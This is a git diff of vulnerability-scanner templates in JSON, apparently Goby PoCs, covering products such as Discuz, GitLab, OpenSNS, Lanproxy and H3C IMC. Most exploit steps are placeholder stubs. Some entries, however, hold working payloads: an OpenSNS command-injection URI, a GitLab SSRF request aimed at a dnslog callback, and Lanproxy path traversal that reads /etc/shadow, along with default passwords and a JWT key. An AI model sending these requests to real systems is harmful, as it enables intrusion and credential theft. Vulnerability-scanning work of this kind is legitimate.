"Product": "Datang Telecom AC centralized management platform",
"Homepage": "http://www.datang.com/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Datang AC centralized management platform default password admin/123456",
"Recommendation": "",
"References": [],
"HasExp": true,
@ -99,6 +99,6 @@
]
}
],
"PostTime": "2021-11-12 19:44:34",
"GobyVersion": "1.8.302"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

49
poc/DedeCMS_Carbuyaction_FileInclude.json
View File

@ -5,16 +5,16 @@
"FileInclude"
],
"GobyQuery": "app=\"DedeCMS\"",
"Description": "DedeCMS Carbuyaction.php页面存在本地文件包含漏洞",
"Description": "Dream Weaving (DedeCMS) Official Website- Content Management System- Shanghai Zhuozhuo Network Technology Co., Ltd.",
"Product": "DedeCMS",
"Homepage": "http://www.dedecms.com/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "DedeCMS Carbuyaction.php has a local file inclusion vulnerability.",
"Recommendation": "",
"References": [
"https://www.cnblogs.com/milantgh/p/3615986.html"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -88,6 +88,43 @@
]
}
],
"PostTime": "2021-11-13 14:18:50",
"GobyVersion": "1.8.302"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

53
poc/Discuz_RCE_WOOYUN_2010_080723.json
View File

@ -4,17 +4,17 @@
"Tags": [
"rce"
],
"GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")",
"Description": "由于php5.3.x版本里php.ini的设置里request_order默认值为GP导致$_REQUEST中不再包含$_COOKIE我们通过在Cookie中传入$GLOBALS来覆盖全局变量造成代码执行漏洞。",
"Product": "discuz",
"GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"",
"Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.",
"Product": "Discuz!",
"Homepage": "https://www.discuz.net/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Since the default value of request_order in the php.ini setting in php5.3.x version is GP, $_COOKIE is no longer included in $_REQUEST. We overwrite the global variable by passing in $GLOBALS in the cookie, resulting in a code execution vulnerability.",
"Recommendation": "",
"References": [
"https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -66,6 +66,43 @@
]
}
],
"PostTime": "2021-11-17 13:57:54",
"GobyVersion": "1.8.302"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

53
poc/Discuz_Wechat_Plugins_Unauth.json
View File

@ -4,17 +4,17 @@
"Tags": [
"unauth"
],
"GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")",
"Description": "由Discuz论坛官方微信登录插件产生攻击者可以利用该插件的漏洞绕过论坛的邮箱、手机号等各种验证非法创建论坛账号通过该漏洞创建的论坛账号具备一般用户的所有权限可以任意发帖回帖.",
"Product": "discuz",
"GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"",
"Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.",
"Product": "Discuz!",
"Homepage": "https://www.discuz.net/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Generated by the official WeChat login plug-in of Discuz Forum, attackers can use the vulnerability of this plug-in to bypass the forum's mailbox, mobile phone number and other verifications to illegally create a forum account. The forum account created through this vulnerability has all the permissions of ordinary users and can be arbitrarily Post a reply.",
"Recommendation": "",
"References": [
"https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -78,6 +78,43 @@
]
}
],
"PostTime": "2021-11-17 13:52:51",
"GobyVersion": "1.8.302"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

53
poc/Discuz_v72_SQLI.json
View File

@ -4,17 +4,17 @@
"Tags": [
"sqli"
],
"GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")",
"Description": "discuz7.2论坛存在sql注入漏洞",
"Product": "Discuz",
"GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"",
"Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.",
"Product": "Discuz!",
"Homepage": "https://www.discuz.net/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Discuz7.2 has sql injection vulnerability.",
"Recommendation": "",
"References": [
"https://blog.csdn.net/weixin_40709439/article/details/82780606"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -64,6 +64,43 @@
]
}
],
"PostTime": "2021-11-16 17:48:16",
"GobyVersion": "1.8.302"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

51
poc/Docker_Registry_API_Unauth.json
View File

@ -1,20 +1,20 @@
{
"Name": "Docker Registry API Unauth",
"Level": "2",
"Level": "1",
"Tags": [
"unauth"
],
"GobyQuery": "header=\"registry/2.0\"",
"Description": "Docker Registry API 存在未授权访问漏洞黑客可通过API下载docker images导致敏感信息泄露。",
"Description": "Docker is a set of platform as a service products that use OS-level virtualization to deliver software in packages called containers.",
"Product": "Docker Registry",
"Homepage": "https://docs.docker.com/registry/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "There is an unauthorized access vulnerability in the Docker Registry API. Docker images can be downloaded through the API, resulting in the disclosure of sensitive information.",
"Recommendation": "",
"References": [
"https://www.freeaihub.com/post/6085.html"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -98,6 +98,43 @@
]
}
],
"PostTime": "2021-11-27 14:21:33",
"GobyVersion": "1.9.310"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

14
poc/Fastmeeting_Arbitrary_File_Read.json
View File

@ -1,15 +1,15 @@
{
"Name": "好视通云会议存在任意文件读取漏洞",
"Name": "Fastmeeting Arbitrary File Read",
"Level": "2",
"Tags": [
"fileread"
],
"GobyQuery": "body=\"深圳银澎云计算有限公司\"",
"Description": "好视通云会议存在任意文件读取漏洞",
"Product": "好视通云会议",
"Description": "hst",
"Product": "hst",
"Homepage": "https://www.hst.com/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Fastmeeting Arbitrary File Read",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s/fMNE1PF5n81O1BpoDRlYkA"
@ -100,6 +100,6 @@
]
}
],
"PostTime": "2021-12-11 14:50:39",
"GobyVersion": "1.9.310"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

51
poc/FineReport_v9_Arbitrary_File_Overwrite.json
View File

@ -5,16 +5,16 @@
"overwrite"
],
"GobyQuery": "app=\"fanruansem-FineReport\"",
"Description": "由于在初始化svg文件时未对传入的参数做限制导致可以对已存在的文件覆盖写入数据从而通过将木马写入jsp文件中获取服务器权限",
"Product": "帆软-FineReport",
"Description": "FineReport is an web reporting tool.",
"Product": "fanruan-FineReport",
"Homepage": "https://www.fanruan.com/",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "Since there is no restriction on the incoming parameters when initializing the svg file, data can be overwritten to the existing file, so that the server permission can be obtained by writing the Trojan into the jsp file.",
"Recommendation": "",
"References": [
"https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -88,6 +88,43 @@
]
}
],
"PostTime": "2021-12-08 11:22:44",
"GobyVersion": "1.9.310"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

99
poc/GitLab_SSRF_CVE_2021_22214.json
View File

@ -1,26 +1,35 @@
{
"Name": "GitLab SSRF CVE-2021-22214",
"Level": "3",
"Tags": [],
"GobyQuery": "app=\"GitLab\"",
"Description": "GitLab存在前台未授权SSRF漏洞未授权的攻击者也可以利用该漏洞执行SSRF攻击CVE-2021-22214。该漏洞源于对用户提供数据的验证不足远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。",
"Product": "Gitlab > 10.5",
"Homepage": "https://gobies.org/",
"Author": "luckying",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
"Tags": [
"SSRF"
],
"HasExp": true,
"ExpParams": [
{
"name": "URL",
"type": "input",
"value": "test.dnslog.cn",
"show": ""
}
],
"GobyQuery": "app=\"GitLab\"",
"Description": "GitLab is The DevOps Platform.",
"Product": "GitLab",
"Homepage": "https://about.gitlab.com/",
"Author": "",
"Impact": "When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.",
"Recommendation": "",
"References": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-22214",
"https://nvd.nist.gov/vuln/detail/CVE-2021-39935",
"https://nvd.nist.gov/vuln/detail/CVE-2021-22175",
"https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html",
"https://docs.gitlab.com/ee/api/lint.html"
],
"HasExp": true,
"ExpParams": [
{
"Name": "URL",
"Type": "input",
"Value": "test.dnslog.cn"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -30,8 +39,7 @@
"follow_redirect": false,
"header": {
"Content-Type": "application/json",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Content-Length": ""
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
},
"data_type": "text",
"data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://test.dnslog.cn/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}"
@ -57,9 +65,45 @@
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/api/v4/ci/lint?include_merged_yaml=true",
"follow_redirect": true,
"header": {
"Content-Type": "application/json"
},
"data_type": "text",
"data": "{\"content\": \"include:\\n remote: http://127.0.0.1:9100/test.yml\"}",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "does not have valid YAML syntax",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
@ -68,8 +112,7 @@
"follow_redirect": false,
"header": {
"Content-Type": "application/json",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Content-Length": ""
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
},
"data_type": "text",
"data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://{{{URL}}}/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}"
@ -95,10 +138,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-07-01 20:34:22",
"GobyVersion": "1.8.268"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

52
poc/H3C_IMC_RCE.json
View File

@ -1,26 +1,32 @@
{
"Name": "H3C IMC远程命令执行",
"Name": "H3C IMC RCE",
"Level": "3",
"Tags": [],
"Tags": [
"rce"
],
"GobyQuery": "product=\"H3C-iMC\"",
"Description": "",
"Product": "H3C iMC 智能管理中心平台",
"Description": "H3C IMC",
"Product": "H3C IMC",
"Homepage": "http://www.h3c.com/cn/Products___Technology/Products/H3C_Soft/IT_Business/Resource/iMC_Flat",
"Author": "ying",
"Impact": "",
"Recommandation": "",
"Author": "",
"Impact": "A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint.",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw",
"https://www.t00ls.net/articles-60979.html"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "whoami",
"show": ""
}
],
"HasExp": true,
"ExpParams": [
{
"Name": "Cmd",
"Type": "input",
"Value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -57,8 +63,8 @@
},
"SetVariable": []
}
],
"ExploitSteps": [
],
"ExploitSteps": [
"AND",
{
"Request": {
@ -93,10 +99,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-05-28 10:06:39",
"GobyVersion": "1.8.268"
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

63
poc/IRDM4000_Smart_station_Unauthorized_access.json
View File

@ -1,18 +1,18 @@
{
"Name": "IRDM4000 Smart station Unauthorized access",
"Level": "2",
"Tags": [],
"GobyQuery": "body=\"iRDM4000智慧站房在线监管\"",
"Description": "IRDM4000 unauthorized access vulnerability of userId=0",
"Product": "IRDM4000 Smart station",
"Homepage": "http://www.houtian-hb.com",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommendation": "",
"References": [
"https://gobies.org/"
"Tags": [
"unauthorized access"
],
"HasExp": true,
"GobyQuery": "body=\"iRDM4000智慧站房在线监管\"",
"Description": "IRDM4000 Smart station",
"Product": "IRDM4000 Smart station",
"Homepage": "http://www.houtian-hb.com/",
"Author": "",
"Impact": "IRDM4000 unauthorized access vulnerability of userId=0",
"Recommendation": "",
"References": [],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -64,43 +64,6 @@
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "2021-10-26 10:55:38",
"GobyVersion": "1.9.304"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

53
poc/IceWarp_WebClient_basic_RCE.json
View File

@ -1,26 +1,31 @@
{
"Name": "IceWarp WebClient basic RCE",
"Level": "3",
"Tags": [],
"GobyQuery": "body=\"Powered by IceWarp\"",
"Description": "",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "luckying",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
"Tags": [
"rce"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "ipconfig",
"show": ""
}
],
"GobyQuery": "body=\"Powered by IceWarp\"",
"Description": "IceWarp",
"Product": "IceWarp",
"Homepage": "http://www.icewarp.cn/",
"Author": "",
"Impact": "IceWarp WebClient basic RCE",
"Recommendation": "",
"References": [
"https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"
],
"HasExp": true,
"ExpParams": [
{
"Name": "cmd",
"Type": "input",
"Value": "ipconfig"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -50,7 +55,7 @@
"SetVariable": []
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
@ -77,10 +82,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-06-19 13:19:47",
"GobyVersion": "1.8.268"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

62
poc/Jitong_EWEBS_phpinfo_leak.json
View File

@ -1,17 +1,23 @@
{
"Name": "极通EWEBSphpinfo泄露",
"Level": "3",
"Tags": [],
"Name": "Jitong EWEBS phpinfo leak",
"Level": "0",
"Tags": [
"infoleak"
],
"GobyQuery": "body=\"极通软件\"",
"Description": "",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
],
"Product": "Jitong EWEBS",
"Homepage": "http://www.n-soft.com.cn/",
"Author": "",
"Impact": "Jitong EWEBS phpinfo leak",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -19,7 +25,7 @@
"method": "GET",
"uri": "/testweb.php",
"follow_redirect": false,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -39,6 +45,34 @@
"SetVariable": []
}
],
"PostTime": "2021-06-17 21:19:12",
"GobyVersion": "1.8.268"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/testweb.php",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "PHP Version",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

12
poc/Konga_Default_JWT_KEY.json
View File

@ -4,12 +4,12 @@
"Tags": [
"defaultaccount"
],
"GobyQuery": "(title==\"Konga\" | body=\"window.konga_version\")",
"Description": "Konga JWT默认key为oursecret可伪造任意用户权限。",
"GobyQuery": "title=\"Konga\" || body=\"window.konga_version\"",
"Description": "Konga offers the tools you need to manage your Kong cluster with ease.",
"Product": "Konga",
"Homepage": "https://github.com/pantsel/konga",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "The default key of Konga JWT is oursecret, which can forge arbitrary user permissions.",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg"
@ -112,6 +112,6 @@
]
}
],
"PostTime": "2021-12-03 18:50:39",
"GobyVersion": "1.9.310"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

121
poc/Lanproxy_Directory_traversal_CVE_2021_3019.json
View File

@ -1,36 +1,44 @@
{
"Name": "Lanproxy目录遍历 CVE-2021-3019",
"Name": "Lanproxy Directory Traversal CVE-2021-3019",
"Level": "2",
"Tags": [],
"GobyQuery": "header= \"Server: LPS-0.1\"",
"Description": "lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具目前仅支持tcp流量转发可支持任何tcp上层协议ssh访问、web服务器访问、远程桌面...)。",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "luckying",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
"Tags": [
"Directory Traversal"
],
"HasExp": true,
"ExpParams": [
{
"name": "path",
"type": "input",
"value": "/../conf/config.properties",
"show": ""
}
],
"GobyQuery": "header=\"Server: LPS-0.1\"",
"Description": "Lanproxy is a reverse proxy to help you expose a local server behind a NAT or firewall to the internet. it supports any protocols over tcp (http https ssh ...)",
"Product": "ffay lanproxy 0.1",
"Homepage": "https://github.com/ffay/lanproxy",
"Author": "",
"Impact": "ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.",
"Recommendation": "",
"References": [
"https://github.com/ffay/lanproxy/commits/master",
"https://github.com/maybe-why-not/lanproxy/issues/1",
"https://nvd.nist.gov/vuln/detail/CVE-2021-3019"
],
"HasExp": true,
"ExpParams": [
{
"Name": "Filename",
"Type": "select",
"Value": "/../../../../../../../../../../etc/passwd,/../conf/config.properties,/../../../../../../../../../../etc/shadow"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/../conf/config.properties",
"follow_redirect": false,
"header": {},
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": ""
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
@ -47,34 +55,7 @@
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "config.admin",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "{{{path}}}",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"value": "server.ssl",
"bz": ""
},
{
@ -87,10 +68,40 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|regex|"
]
}
],
"PostTime": "2021-06-24 17:23:13",
"GobyVersion": "1.8.268"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "{{{Filename}}}",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

48
poc/OpenSNS_RCE.json
View File

@ -1,28 +1,32 @@
{
"Name": "OpenSNS 远程代码执行漏洞",
"Name": "OpenSNS RCE",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "body=\"opensns\"",
"Description": "OpenSNS是想天科技开发的一款综合性社交软件存在命令执行漏洞且是administrator",
"Description": "OpenSNS is a comprehensive social software developed by Xiangtian Technology.",
"Product": "OpenSNS",
"Homepage": "http://www.opensns.cn/",
"Author": "luckying",
"Impact": "",
"Recommandation": "",
"Author": "",
"Impact": "A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint.",
"Recommendation": "",
"References": [
"https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn"
"http://www.0dayhack.net/index.php/2417/",
"https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "whoami",
"show": ""
}
],
"HasExp": true,
"ExpParams": [
{
"Name": "Cmd",
"Type": "input",
"Value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -30,7 +34,7 @@
"method": "GET",
"uri": "/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ipconfig)",
"follow_redirect": false,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -50,14 +54,14 @@
"SetVariable": []
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system({{{Cmd}}})",
"follow_redirect": false,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -75,10 +79,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-06-28 11:44:33",
"GobyVersion": "1.8.268"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

63
poc/RuoYi_Druid_Unauthorized_access.json
View File

@ -2,18 +2,22 @@
"Name": "RuoYi Druid Unauthorized access",
"Level": "0",
"Tags": [
"Disclosure of Sensitive Information"
"infoleak"
],
"GobyQuery": "app=\"ruoyi-System\"",
"Description": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information",
"Description": "RuoYi",
"Product": "RuoYi",
"Homepage": "https://gitee.com/y_project/RuoYi-Vue",
"Author": "PeiQi",
"Impact": "<p>&nbsp;resulting in unauthorized access to sensitive information<br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"Author": "",
"Impact": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information.",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -21,7 +25,7 @@
"method": "GET",
"uri": "/prod-api/druid/index.html",
"follow_redirect": false,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -55,6 +59,43 @@
"SetVariable": []
}
],
"PostTime": "2021-04-20 23:13:54",
"GobyVersion": "1.8.258"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

82
poc/Samsung_WLAN_AP_WEA453e_RCE.json
View File

@ -1,30 +1,42 @@
{
"Name": "Samsung WLAN AP WEA453e RCE",
"Level": "3",
"Tags": [],
"GobyQuery": "title==\"Samsung WLAN AP\"",
"Description": "三星 WLAN AP WEA453e路由器 存在远程命令执行漏洞,可在未授权的情况下执行任意命令获取服务器权限",
"Product": "三星 WLAN AP WEA453e路由器",
"Homepage": "https://www.samsung.com/",
"Author": "lxy@secbug.org",
"Impact": "<p>暂无</p>",
"Recommandation": "<p>暂无</p>",
"References": [
"Internet"
"Tags": [
"rce"
],
"GobyQuery": "title=\"Samsung WLAN AP\" || app=\"Chunjs-server\" && body=\"Samsung Electronics\"",
"Description": "Samsung WLAN AP WEA453e",
"Product": "Samsung WLAN AP WEA453e",
"Homepage": "https://www.samsung.com/",
"Author": "",
